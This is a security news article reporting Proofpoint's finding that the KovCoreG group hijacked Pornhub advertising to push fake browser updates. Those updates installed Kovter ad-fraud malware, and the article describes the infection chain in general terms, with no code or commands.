Pornhub hacked: Millions exposed to ad fraud malware masquerading as browser updates

Pornhub hacked: Millions exposed to ad fraud malware masquerading as browser updates

Millions exposed to ad fraud malware masquerading as browser updates

Millions of Pornhub users were exposed to a sophisticated ad fraud malware after a hacker group hijacked advertising on Pornhub to display fake browser update links.

The ad fraud malware takes control of systems, raises money by generating clicks on fake advertisements, and sends device data to C&C servers.

Millions of people who visited Pornhub in the United States, the UK, Canada, and Australia in the past year were exposed to an ad fraud malware which hackers had injected to the site by placing fake browser update adverts.

Users of Google Chrome, Firefox and Microsoft Edge browsers were equally exposed to the ad fraud malware which has been in use as a sophisticated click-generating software for years.

According to security firm Proofpoint which uncovered the operation, a hacker group known as KovCoreG hacked into Pornhub advertising and posted fake browser updates to induce visitors to click on them. While Chrome and Firefox users were asked to click on such links to update their browsers with the latest fixes, Microsoft Edge users were offered an update to the Adobe Flash Player.

Once a visitor clicks on such a link, he/she is asked to open a download file which contains zipped files known either as runme.js, firefox-patch.js or FlashPlayer.hta, depending upon the browser being used.

Once these files are downloaded and run by visitors, they download payloads that contain Powershell scripts that embed shellcodes. These shellcodes launch ‘avi’ files which are, in fact, Kovter ad fraud malware when then take control of devices and generate clicks for fraudulent advertisements.

‘This attack chain exposed millions of potential victims in the US, Canada, the UK, and Australia, leveraging slight variations on a fake browser update scheme that worked on all three major Windows web browsers,’ said researchers at Proofpoint.

‘The attack has been active for more than a year and is ongoing elsewhere, but this particular infection pathway was shut down when the site operator and ad network were notified of the activity,’ they added.

According to the researchers, the operation is a classic example of how hackers are using social engineering and the human factor to inject malware into devices. Malware are cleverly disguised as genuine browser updates or other software and this helps hackers fool gullible visitors.

‘While the payload in this case is ad fraud malware, it could just as easily have been ransomware, an information stealer, or any other malware. Regardless, threat actors are following the money and looking to more effective combinations of social engineering, targeting, and pre-filtering to infect new victims at scale,’ they added.

Copyright Lyonsdown Limited 2021

Top Articles

RockYou2021 data leak: 8.4 billion passwords compromised

A report shows that 100GB of data which includes 8.4 billion passwords have been recently leaked on the internet, people are being encouraged to secure their accounts.

Hackers Breach Electronic Arts & Steal Game Code

Electronic Arts, one of the world's biggest video game publishers including games such as FIFA, Madden, Sims and Medal of Honor, are the latest company to be hacked.

JBS Foods paid £7.7m in ransom to REvil ransomware gang

JBS Foods, the world’s largest processor of beef and poultry products, has admitted to paying a ransom of $11 million to cyber criminals, a week after it announced that operations…

Related Articles

[s2Member-Login login_redirect=”” /]